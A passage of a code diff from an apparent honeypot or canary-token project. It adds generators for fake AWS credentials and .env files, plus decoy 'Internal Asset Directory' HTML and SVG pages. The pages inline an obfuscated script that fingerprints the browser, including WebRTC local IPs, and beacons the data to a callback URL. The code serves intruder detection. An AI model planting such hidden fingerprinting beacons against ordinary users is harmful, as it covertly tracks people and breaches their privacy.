 # generator" error message.
 KNOWN_GENERATORS: Tuple[str, ...] = (
    "git_config",
    "env_file",
    "ssh_key",
    "aws_creds",
    "honeydoc",
    "honeydoc_docx",
    "honeydoc_pdf",
    "mysql_dump",
    "fingerprint_html",
    "fingerprint_svg",
 )
 # Names accepted by ``get_instrumenter``.  Keep in sync with the
 # branches of that function; echoed in its "unknown instrumenter"
 # error message.
 KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
    "docx",
    "xlsx",
    "pdf",
    "html",
    "image",
    "plain",
    "passthrough",
 )
 def get_generator(name: str) -> CanaryGenerator:
    """Instantiate the generator registered under ``name``.
    Each implementation module is imported only inside its own branch,
    so asking for one generator never loads the others.
    Raises :class:`ValueError` for unknown names so a typo in the API
    request surfaces as a 400 rather than silently producing nothing.
    """
    if name == "git_config":
        from decnet.canary.generators.git_config import GitConfigGenerator as impl
    elif name == "env_file":
        from decnet.canary.generators.env_file import EnvFileGenerator as impl
    elif name == "ssh_key":
        from decnet.canary.generators.ssh_key import SSHKeyGenerator as impl
    elif name == "aws_creds":
        from decnet.canary.generators.aws_creds import AWSCredsGenerator as impl
    elif name == "honeydoc":
        from decnet.canary.generators.honeydoc import HoneydocGenerator as impl
    elif name == "honeydoc_docx":
        from decnet.canary.generators.honeydoc_docx import (
            HoneydocDocxGenerator as impl,
        )
    elif name == "honeydoc_pdf":
        from decnet.canary.generators.honeydoc_pdf import (
            HoneydocPdfGenerator as impl,
        )
    elif name == "mysql_dump":
        from decnet.canary.generators.mysql_dump import MySQLDumpGenerator as impl
    elif name == "fingerprint_html":
        from decnet.canary.generators.fingerprint_html import (
            FingerprintHtmlGenerator as impl,
        )
    elif name == "fingerprint_svg":
        from decnet.canary.generators.fingerprint_svg import (
            FingerprintSvgGenerator as impl,
        )
    else:
        raise ValueError(
            f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
        )
    return impl()
 def get_instrumenter(name: str) -> CanaryInstrumenter:
    """Instantiate the instrumenter registered under ``name``.
    Implementation modules are imported lazily, one per branch.  Raises
    :class:`ValueError` when ``name`` is not a known instrumenter.
    """
    if name == "docx":
        from decnet.canary.instrumenters.docx import DocxInstrumenter as impl
    elif name == "xlsx":
        from decnet.canary.instrumenters.xlsx import XlsxInstrumenter as impl
    elif name == "pdf":
        from decnet.canary.instrumenters.pdf import PdfInstrumenter as impl
    elif name == "html":
        from decnet.canary.instrumenters.html import HtmlInstrumenter as impl
    elif name == "image":
        from decnet.canary.instrumenters.image import ImageInstrumenter as impl
    elif name == "plain":
        from decnet.canary.instrumenters.plain import PlainInstrumenter as impl
    elif name == "passthrough":
        from decnet.canary.instrumenters.passthrough import (
            PassthroughInstrumenter as impl,
        )
    else:
        raise ValueError(
            f"Unknown canary instrumenter: {name!r}. Known: {KNOWN_INSTRUMENTERS}"
        )
    return impl()
 # MIME → instrumenter dispatch.  Order matters: we walk the table
 # top-to-bottom and the first prefix match wins, so a specific entry
 # (``text/html``) must stay above the generic prefix that would also
 # match it (``text/``).  Types with no entry here — archives,
 # ``application/octet-stream``, executables — fall through to
 # ``"passthrough"`` in ``pick_instrumenter_for_mime``.
 _MIME_DISPATCH: tuple[tuple[str, str], ...] = (
    # Office Open XML — DOCX/XLSX share a zip structure but expose
    # different inner trees, so dispatch by MIME alias rather than
    # zip-poking.
    ("application/vnd.openxmlformats-officedocument.wordprocessingml.document", "docx"),
    ("application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", "xlsx"),
    ("application/pdf", "pdf"),
    ("text/html", "html"),
    ("application/xhtml+xml", "html"),
    ("image/png", "image"),
    ("image/jpeg", "image"),
    ("image/gif", "image"),
    # Plaintext catch-alls — config files, .env, .ini, .yaml, .json,
    # source code.  All handled by the same regex-substitution pass.
    ("text/", "plain"),
    ("application/json", "plain"),
    ("application/x-yaml", "plain"),
    ("application/yaml", "plain"),
    ("application/toml", "plain"),
 )
 def pick_instrumenter_for_mime(content_type: str) -> str:
    """Map a sniffed MIME type to an instrumenter name.
    The content type is lowercased and compared against
    :data:`_MIME_DISPATCH` in table order; the first entry whose prefix
    it starts with wins.  An empty content type, or one with no matching
    prefix, yields ``"passthrough"`` — the fallback for binary blobs we
    can't mutate safely (container images, archives, executables).
    ``passthrough`` only supports DNS-callback tokens (the slug ends up
    in the filename or an accompanying README), so the API surfaces
    that constraint to the operator before they pick a kind.
    """
    fallback = "passthrough"
    if not content_type:
        return fallback
    needle = content_type.lower()
    return next(
        (
            instrumenter_name
            for mime_prefix, instrumenter_name in _MIME_DISPATCH
            if needle.startswith(mime_prefix)
        ),
        fallback,
    )
--- a/decnet/canary/fingerprint_payload.js
+++ b/decnet/canary/fingerprint_payload.js
@@ -0,0 +1,292 @@
 // SPDX-License-Identifier: AGPL-3.0-or-later
 // Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
 // canary, harvests browser primitives, and beacons the result back to the
 // canary worker.  Ported from canary-self-test.html with the rendering UI
 // stripped out.
 //
 // Three placeholders are substituted by the Python builder BEFORE
 // javascript-obfuscator runs:
 //
 //   {{BEACON_URL}}  → full URL to /c/<callback_token> (no trailing slash)
 //   {{MINT_UUID}}   → per-mint UUID, baked into the string-array post-obf
 //   {{MINT_NONCE}}  → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
 //
 // Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
 // then a fingerprint payload sent as a base64-URL query param on a second
 // GET so the existing worker records the hit even before step-4 POST
 // support lands.  Both fail-open: any error short-circuits to next step.
 (async function () {
  // Placeholders below are substituted by the Python builder before
  // obfuscation; see the header comment of this file.
  var BEACON_URL = "{{BEACON_URL}}";
  var MINT_UUID = "{{MINT_UUID}}";
  var MINT_NONCE = "{{MINT_NONCE}}";
  // Accumulated fingerprint; every probe writes one short key onto it.
  var fp = { mint: MINT_UUID };
  // Fire-and-forget GET via an image request; never throws.
  function fire(url) {
    try {
      var img = new Image();
      img.src = url;
    } catch (e) { /* swallow */ }
  }
  // 1) bare-open beacon — fires regardless of whether the rest succeeds
  fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
  // Resolve to the lowercase hex SHA-256 of a string (UTF-8 encoded).
  function sha256(str) {
    var buf = new TextEncoder().encode(str);
    return crypto.subtle.digest("SHA-256", buf).then(function (h) {
      return Array.from(new Uint8Array(h))
        .map(function (b) { return b.toString(16).padStart(2, "0"); })
        .join("");
    });
  }
  // navigator
  try {
    fp.nav = {
      ua: navigator.userAgent,
      pl: navigator.platform,
      lg: navigator.language,
      lgs: (navigator.languages || []).join(","),
      ck: navigator.cookieEnabled,
      dnt: navigator.doNotTrack,
      hc: navigator.hardwareConcurrency,
      dm: navigator.deviceMemory || null,
      tp: navigator.maxTouchPoints,
      wd: navigator.webdriver === true,
      pdf: navigator.pdfViewerEnabled || null,
    };
  } catch (e) { fp.nav = { err: String(e) }; }
  // screen
  try {
    fp.scr = {
      w: screen.width, h: screen.height,
      aw: screen.availWidth, ah: screen.availHeight,
      cd: screen.colorDepth, pd: screen.pixelDepth,
      dpr: window.devicePixelRatio,
      iw: window.innerWidth, ih: window.innerHeight,
      or: (screen.orientation && screen.orientation.type) || null,
    };
  } catch (e) { fp.scr = { err: String(e) }; }
  // tz / locale
  try {
    var dtf = Intl.DateTimeFormat().resolvedOptions();
    fp.tz = {
      z: dtf.timeZone, lc: dtf.locale,
      ca: dtf.calendar, ns: dtf.numberingSystem,
      off: new Date().getTimezoneOffset(),
    };
  } catch (e) { fp.tz = { err: String(e) }; }
  // connection
  try {
    var c = navigator.connection;
    fp.cn = c ? {
      t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
    } : null;
  } catch (e) { fp.cn = { err: String(e) }; }
  // canvas
  try {
    var cv = document.createElement("canvas");
    cv.width = 280; cv.height = 60;
    var ctx = cv.getContext("2d");
    ctx.textBaseline = "top";
    ctx.font = "14px Arial";
    ctx.fillStyle = "#f60";
    ctx.fillRect(125, 1, 62, 20);
    // U+1F600 lies outside the BMP: String.fromCharCode would truncate it
    // to U+F600 (a private-use code point) and the emoji glyph would
    // never be drawn, so build the string with fromCodePoint.
    var glyph = "c-" + String.fromCodePoint(0x1f600);
    ctx.fillStyle = "#069";
    ctx.fillText(glyph, 2, 15);
    ctx.fillStyle = "rgba(102,204,0,0.7)";
    ctx.fillText(glyph, 4, 17);
    var dataURL = cv.toDataURL();
    fp.cv = { h: await sha256(dataURL), n: dataURL.length };
  } catch (e) { fp.cv = { err: String(e) }; }
  // webgl
  try {
    var gc = document.createElement("canvas");
    var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
    if (gl) {
      var ext = gl.getExtension("WEBGL_debug_renderer_info");
      fp.gl = {
        v: gl.getParameter(gl.VENDOR),
        r: gl.getParameter(gl.RENDERER),
        ver: gl.getParameter(gl.VERSION),
        sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
        uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
        ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
      };
    } else { fp.gl = { err: "unavailable" }; }
  } catch (e) { fp.gl = { err: String(e) }; }
  // audio
  try {
    var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
    if (ACtx) {
      var actx = new ACtx(1, 44100, 44100);
      var osc = actx.createOscillator();
      var cmp = actx.createDynamicsCompressor();
      osc.type = "triangle"; osc.frequency.value = 10000;
      cmp.threshold.value = -50; cmp.knee.value = 40;
      cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
      osc.connect(cmp); cmp.connect(actx.destination);
      osc.start(0);
      var buf = await actx.startRendering();
      var data = buf.getChannelData(0).slice(4500, 5000);
      var sum = 0;
      for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
      fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
    } else { fp.au = { err: "unavailable" }; }
  } catch (e) { fp.au = { err: String(e) }; }
  // fonts — a candidate counts as installed when it changes the rendered
  // size of the probe span relative to any generic fallback family.
  try {
    var bases = ["monospace", "sans-serif", "serif"];
    var tests = [
      "Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
      "Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
      "Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
      "JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
      "Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
      "San Francisco", "Helvetica Neue", "Lucida Grande",
      "DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
      "Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
      "Noto Sans", "Noto Mono",
      "Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
      "Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
      "Malgun Gothic", "Noto Sans CJK",
      "Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
      "Bahnschrift", "Cyberpunk",
    ];
    var sp = document.createElement("span");
    sp.style.fontSize = "72px";
    sp.style.position = "absolute";
    sp.style.left = "-9999px";
    sp.innerHTML = "mmmmmmmmmmlli";
    document.body.appendChild(sp);
    var bs = {};
    for (var bi = 0; bi < bases.length; bi++) {
      sp.style.fontFamily = bases[bi];
      bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
    }
    var det = [];
    for (var ti = 0; ti < tests.length; ti++) {
      for (var bj = 0; bj < bases.length; bj++) {
        sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
        if (sp.offsetWidth !== bs[bases[bj]].w ||
            sp.offsetHeight !== bs[bases[bj]].h) {
          det.push(tests[ti]); break;
        }
      }
    }
    document.body.removeChild(sp);
    fp.ft = {
      h: await sha256(det.slice().sort().join(",")),
      n: det.length, t: tests.length, d: det,
    };
  } catch (e) { fp.ft = { err: String(e) }; }
  // webrtc local ip leak
  try {
    var ips = {}; var cands = [];
    var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
              window.mozRTCPeerConnection;
    if (RPC) {
      var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
      try {
        pc.createDataChannel("");
        pc.onicecandidate = function (e) {
          if (!e.candidate) return;
          cands.push(e.candidate.candidate);
          var m = e.candidate.candidate.match(
            /(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
          if (m) ips[m[1]] = 1;
        };
        var off = await pc.createOffer();
        await pc.setLocalDescription(off);
        // Give ICE gathering a fixed window to report candidates.
        await new Promise(function (r) { setTimeout(r, 1500); });
      } finally {
        // Release the peer connection even when the offer fails;
        // otherwise it lingers for the lifetime of the page.
        pc.close();
      }
      fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
    } else { fp.rtc = { err: "unavailable" }; }
  } catch (e) { fp.rtc = { err: String(e) }; }
  // battery
  try {
    if (navigator.getBattery) {
      var bat = await navigator.getBattery();
      fp.bt = {
        c: bat.charging, l: bat.level,
        ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
        dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
      };
    } else { fp.bt = { err: "unavailable" }; }
  } catch (e) { fp.bt = { err: String(e) }; }
  // perf timing jitter
  try {
    var samples = [];
    for (var pi = 0; pi < 1000; pi++) {
      var pa = performance.now();
      var x = 0;
      for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
      samples.push(performance.now() - pa);
    }
    samples.sort(function (a, b) { return a - b; });
    fp.pf = {
      med: samples[500].toFixed(4),
      p95: samples[950].toFixed(4),
      mn: samples[0].toFixed(4),
      mx: samples[999].toFixed(4),
    };
  } catch (e) { fp.pf = { err: String(e) }; }
  // permissions
  try {
    if (navigator.permissions) {
      var names = ["geolocation", "notifications", "camera", "microphone",
                   "persistent-storage", "clipboard-read", "clipboard-write"];
      var st = {};
      for (var ni = 0; ni < names.length; ni++) {
        try {
          var r = await navigator.permissions.query({ name: names[ni] });
          st[names[ni]] = r.state;
        } catch (e) { st[names[ni]] = "unsupported"; }
      }
      fp.pm = st;
    } else { fp.pm = { err: "unavailable" }; }
  } catch (e) { fp.pm = { err: String(e) }; }
  // composite identity hash — stable inputs only
  try {
    var stable = [
      fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
      fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
      fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
      fp.scr && (fp.scr.w + "x" + fp.scr.h),
    ].filter(Boolean).join("|");
    fp.id = await sha256(stable);
  } catch (e) { fp.id = { err: String(e) }; }
  // 2) ship the payload as base64url JSON on a GET query param.
  //    The current worker records the hit on /c/<slug>; step-4 worker
  //    will decode ?d= and persist the fingerprint blob.
  try {
    var json = JSON.stringify(fp);
    var b64 = btoa(unescape(encodeURIComponent(json)))
      .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
    // chunk if URL would exceed safe limit (~6KB)
    var MAX = 6000;
    if (b64.length <= MAX) {
      fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
    } else {
      // s = random session id tying the chunks together, i = chunk
      // index, n = chunk count.
      var sid = (Math.random() * 1e9 | 0).toString(36);
      var total = Math.ceil(b64.length / MAX);
      for (var ci = 0; ci < total; ci++) {
        // slice() replaces the deprecated substr(); same chunk bounds.
        var part = b64.slice(ci * MAX, (ci + 1) * MAX);
        fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
      }
    }
  } catch (e) { /* swallow */ }
 })();
--- a/decnet/canary/generators/init.py
+++ b/decnet/canary/generators/init.py
@@ -0,0 +1,8 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Built-in canary generators (synthesised fake artifacts).
 Concrete classes live in sibling modules and are imported lazily by
 :func:`decnet.canary.factory.get_generator` to keep the import-time
 cost of :mod:`decnet.canary` cheap for callers that only need the
 ABCs.
 """
--- a/decnet/canary/generators/aws_creds.py
+++ b/decnet/canary/generators/aws_creds.py
@@ -0,0 +1,87 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake ``~/.aws/credentials`` block (passive bait).
 This is the **passive** variant — no callback wiring.  An attacker
 who exfils these keys can't trip a detection unless we run a real
 AWS account with a deny-all CloudTrail listener (post-v1).  The
 realism is the point: the file looks like a routinely used credentials
 file, so the rest of the decky's persona feels lived-in.
 If the operator picks ``kind="aws_passive"`` we accept that no slug
 will be embedded.  If they pick ``kind="http"`` or ``kind="dns"`` for
 this generator, the API will reject the combination with a 400 — AWS
 keys have no plausible field where a URL or hostname survives a
 ``grep -E '[A-Z0-9]{20}'`` smell test.
 """
 from __future__ import annotations
 import hashlib
 from secrets import token_urlsafe
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 # Stable AWS-style key body derived from the slug.  Keeping the
 # generator deterministic (per-slug) means re-seeding produces the
 # same bytes — the planter is naturally idempotent and an operator
 # who runs ``decnet canary verify`` can re-derive the expected file
 # without touching the DB.
 def _fake_access_key(seed: str) -> str:
    # AWS access keys are 20 chars, uppercase alphanum, AKIA prefix.
    body = hashlib.sha256(seed.encode()).hexdigest().upper()
    return "AKIA" + body[:16]
 def _fake_secret_key(seed: str) -> str:
    # AWS secret keys are 40 chars, mixed-case base64-ish.  We use
    # base64-safe characters from token_urlsafe seeded by a SHA-256
    # of the seed so the output is stable per slug.
    h = hashlib.sha256(("secret:" + seed).encode()).digest()
    # Reuse token_urlsafe for the alphabet but pad to 40 chars from
    # the deterministic bytes so we don't depend on os.urandom.
    import base64
    return base64.b64encode(h)[:40].decode()
 class AWSCredsGenerator(CanaryGenerator):
    """Passive-bait generator that renders a two-profile AWS credentials file."""
    name = "aws_creds"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render ``[default]`` and ``[prod]`` profiles keyed off the callback token.
        Both key pairs are derived from ``ctx.callback_token`` (the
        ``[prod]`` pair from the token prefixed with ``prod-``).  No
        callback URL or hostname is written into the file.
        """
        token = ctx.callback_token
        prod_seed = "prod-" + token
        lines = [
            "[default]",
            f"aws_access_key_id = {_fake_access_key(token)}",
            f"aws_secret_access_key = {_fake_secret_key(token)}",
            "region = us-east-1",
            "",
            "[prod]",
            f"aws_access_key_id = {_fake_access_key(prod_seed)}",
            f"aws_secret_access_key = {_fake_secret_key(prod_seed)}",
            "region = us-west-2",
        ]
        text = "\n".join(lines) + "\n"
        artifact_notes = [
            "fake AWS keys; no callback embedded — passive bait only",
            f"derived deterministically from slug={token}",
        ]
        return CanaryArtifact(
            path="",  # left empty here; the original note says the planter fills it in
            content=text.encode("utf-8"),
            mode=0o600,
            mtime_offset=-14 * 86400,  # fourteen days in the past
            generator=self.name,
            notes=artifact_notes,
        )
 # The two private key helpers are listed in ``__all__`` on purpose so
 # that other modules (the original note names instrumenters/passthrough)
 # can import them from this module.
 __all__ = ["AWSCredsGenerator", "_fake_access_key", "_fake_secret_key"]
 # ``token_urlsafe`` is imported at the top of this module but never
 # called: the key helpers above derive everything from SHA-256 digests.
 # This throwaway binding references the name once so the import is not
 # reported as unused.
 _ = token_urlsafe
--- a/decnet/canary/generators/env_file.py
+++ b/decnet/canary/generators/env_file.py
@@ -0,0 +1,57 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake ``.env`` with embedded callback URLs.
 Modern web stacks read environment variables for everything from
 database DSNs to webhook URLs, so dropping a few realistic-looking
 ``KEY=value`` pairs alongside the canary URL is unremarkable.  The
 slug appears in two fields:
 * ``API_BASE_URL`` — the obvious one; an attacker scripting against
  the credentials hits the worker on first invocation.
 * ``WEBHOOK_NOTIFY_URL`` — secondary, in case the attacker greps for
  ``WEBHOOK`` and pivots there.
 Other fields (``DB_PASSWORD``, ``REDIS_URL``, ``JWT_SECRET``) are
 plausible but inert — they're realism filler, not detection
 mechanisms.
 """
 from __future__ import annotations
 import hashlib
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 def _stable_token(seed: str, prefix: str = "") -> str:
    h = hashlib.sha256((prefix + seed).encode()).hexdigest()
    return h[:32]
 class EnvFileGenerator(CanaryGenerator):
    """Generator for a fake ``.env`` file carrying the callback URL in two keys."""
    name = "env_file"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the ``.env`` body for ``ctx``.
        ``API_BASE_URL`` and ``WEBHOOK_NOTIFY_URL`` point at
        ``<http_base>/c/<callback_token>``; the password/secret values are
        hex strings derived from the callback token via ``_stable_token``.
        """
        token = ctx.callback_token
        callback = f"{ctx.http_base.rstrip('/')}/c/{token}"
        webhook = f"{callback}/webhook"
        redis_password = _stable_token(token, "redis:")[:16]
        entries = [
            "# Production environment — DO NOT COMMIT",
            f"API_BASE_URL={callback}",
            f"WEBHOOK_NOTIFY_URL={webhook}",
            f"DB_PASSWORD={_stable_token(token, 'db:')}",
            f"REDIS_URL=redis://:{redis_password}@redis.internal:6379/0",
            f"JWT_SECRET={_stable_token(token, 'jwt:')}",
            "LOG_LEVEL=info",
            "ENVIRONMENT=production",
        ]
        text = "".join(entry + "\n" for entry in entries)
        return CanaryArtifact(
            path="",
            content=text.encode("utf-8"),
            mode=0o600,
            mtime_offset=-7 * 86400,  # seven days in the past
            generator=self.name,
            notes=[
                f"API_BASE_URL embeds {callback}",
                f"WEBHOOK_NOTIFY_URL embeds {webhook}",
            ],
        )
--- a/decnet/canary/generators/fingerprint_html.py
+++ b/decnet/canary/generators/fingerprint_html.py
@@ -0,0 +1,141 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """HTML fingerprint canary — plausible-looking page with an obfuscated
 browser-fingerprinting payload inlined at the bottom of ``<body>``.
 The visible content is a deliberately mundane "internal directory"
 table — the kind of file a curious attacker pulls off a decky's
 filesystem and opens locally to triage.  When the file is opened in
 *any* network-connected browser the obfuscated payload runs and beacons
 to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
 fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
 timing jitter, permissions, composite identity hash).
 Determinism: the mint UUID is derived from the callback token via
 :func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
 output, satisfying the generator contract in :mod:`decnet.canary.base`.
 The obfuscator's seed and polymorphic config bits are likewise
 callback-token-derived (see :mod:`decnet.canary.obfuscator`).
 """
 from __future__ import annotations
 import hashlib
 import uuid
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
 _MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
 def _mint_uuid_for(callback_token: str) -> str:
    return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
 def _stable_int(callback_token: str, salt: str = "") -> int:
    """Deterministic non-negative int derived from the callback token.
    ``builtins.hash`` is salted per-process — useless for a generator
    that must be byte-identical across runs.  SHA-256 prefix is
    overkill but free.
    """
    h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
    return int.from_bytes(h[:4], "big")
 # ``str.format`` skeleton for the decoy directory page.  CSS braces are
 # doubled so that only {sync_label}, {row_count}, {rows} and {payload}
 # are substituted.  The payload is placed in a <script> element that is
 # the last child of <body>.
 # NOTE(review): the payload is inlined verbatim; presumably the rendered
 # JS never contains a literal "</script" sequence — confirm.
 _PAGE_TEMPLATE = """<!DOCTYPE html>
 <html lang="en">
 <head>
 <meta charset="utf-8">
 <title>Internal Asset Directory</title>
 <style>
 body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
 margin:24px;font-size:13px}}
 h1{{font-size:18px;margin:0 0 4px 0}}
 .sub{{color:#777;font-size:11px;margin-bottom:18px}}
 table{{border-collapse:collapse;width:100%;background:#fff;
 box-shadow:0 1px 2px rgba(0,0,0,.05)}}
 th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
 th{{background:#f4f4f4;font-weight:600;font-size:11px;
 text-transform:uppercase;letter-spacing:.5px;color:#555}}
 tr:hover td{{background:#fafbff}}
 .foot{{margin-top:16px;color:#999;font-size:11px}}
 </style>
 </head>
 <body>
 <h1>Internal Asset Directory</h1>
 <div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
 <table>
 <tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
 {rows}
 </table>
 <div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
 <script>{payload}</script>
 </body>
 </html>
 """
 # Fixed pool of fake directory entries.  Each tuple has five fields in
 # the same order as the table header in ``_PAGE_TEMPLATE``:
 # (hostname, owner, role, vlan, notes).  ``_build_rows`` selects a
 # token-dependent run of consecutive entries from this pool.
 _ROW_POOL = (
    ("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
    ("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
    ("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
    ("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
    ("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
    ("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
    ("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
    ("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
    ("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
 )
 def _build_rows(callback_token: str) -> tuple[str, int]:
    """Render a token-specific run of ``_ROW_POOL`` entries as ``<tr>`` markup.
    The starting index and the number of rows (5 to 8) are both derived
    from ``callback_token`` via ``_stable_int``; selection wraps around the
    end of the pool.
    Returns:
        ``(rows_html, row_count)`` where ``rows_html`` is one ``<tr>`` per
        line, joined with newlines.
    """
    from html import escape
    start = _stable_int(callback_token, "pick") % len(_ROW_POOL)
    count = 5 + (_stable_int(callback_token, "take") % 4)
    selected = [_ROW_POOL[(start + i) % len(_ROW_POOL)] for i in range(count)]
    # Cell values are text, not markup: escape them so entries such as
    # "lag <1s" do not put a raw "<" into the generated HTML.
    cells = "\n".join(
        "<tr>"
        + "".join(f"<td>{escape(c, quote=False)}</td>" for c in row)
        + "</tr>"
        for row in selected
    )
    return cells, len(selected)
 def _sync_label(callback_token: str) -> str:
    """Return the "last sync" timestamp string shown on the decoy page.
    Year, month and minute are fixed (``2026-04`` and ``:14``); the day
    (01-28) and hour (00-23) are derived from ``callback_token``.
    """
    day_of_month = 1 + _stable_int(callback_token, "day") % 28
    hour_of_day = _stable_int(callback_token, "hour") % 24
    return "2026-04-{:02d} {:02d}:14 UTC".format(day_of_month, hour_of_day)
 class FingerprintHtmlGenerator(CanaryGenerator):
    """Generator for the decoy directory page that carries the fingerprint script."""
    name = "fingerprint_html"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the page for ``ctx`` and wrap it in a :class:`CanaryArtifact`.
        The mint UUID, nonce, table rows and sync label are all computed
        from ``ctx.callback_token``.  The nonce is also stored on the
        artifact as ``fingerprint_nonce``.
        """
        token = ctx.callback_token
        mint_uuid = _mint_uuid_for(token)
        nonce = nonce_for(token, mint_uuid)
        script = render_fingerprint_js(
            callback_token=token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        rows_html, row_total = _build_rows(token)
        fields = {
            "sync_label": _sync_label(token),
            "row_count": row_total,
            "rows": rows_html,
            "payload": script,
        }
        page = _PAGE_TEMPLATE.format(**fields)
        beacon_url = ctx.http_base.rstrip("/") + "/c/" + token
        return CanaryArtifact(
            path="",
            content=page.encode("utf-8"),
            mode=0o644,
            mtime_offset=-14 * 86400,  # fourteen days in the past
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon_url}",
                f"mint_uuid={mint_uuid}",
            ],
        )
--- a/decnet/canary/generators/fingerprint_svg.py
+++ b/decnet/canary/generators/fingerprint_svg.py
@@ -0,0 +1,89 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """SVG fingerprint canary — standalone SVG with an embedded ``<script>``
 that runs the obfuscated fingerprinter when the file is opened directly
 in a browser.
 SVG ``<script>`` only fires when the SVG is loaded as a top-level
 document (or via ``<object>``/``<iframe>``); it's *blocked* when the
 SVG is referenced from another page's ``<img>``.  That's the right
 posture for canary use: an attacker browsing the decky filesystem and
 double-clicking a stray ``network_diagram.svg`` triggers it; rendering
 inside a sandboxed CMS preview does not.
 Same determinism guarantees as :mod:`fingerprint_html`.
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
 from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
 # ``str.format`` skeleton for the decoy topology diagram.  CSS braces are
 # doubled so that only {region}, {ver}, {review} and {payload} are
 # substituted.  The payload is placed inside a CDATA section within the
 # <script> element, so it must not contain a raw "]]>" sequence.
 _DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
 <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
 <style>
 .box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
 .lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
 .edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
 .title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
 .cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
 </style>
 <text class="title" x="20" y="28">Network Topology — {region} segment</text>
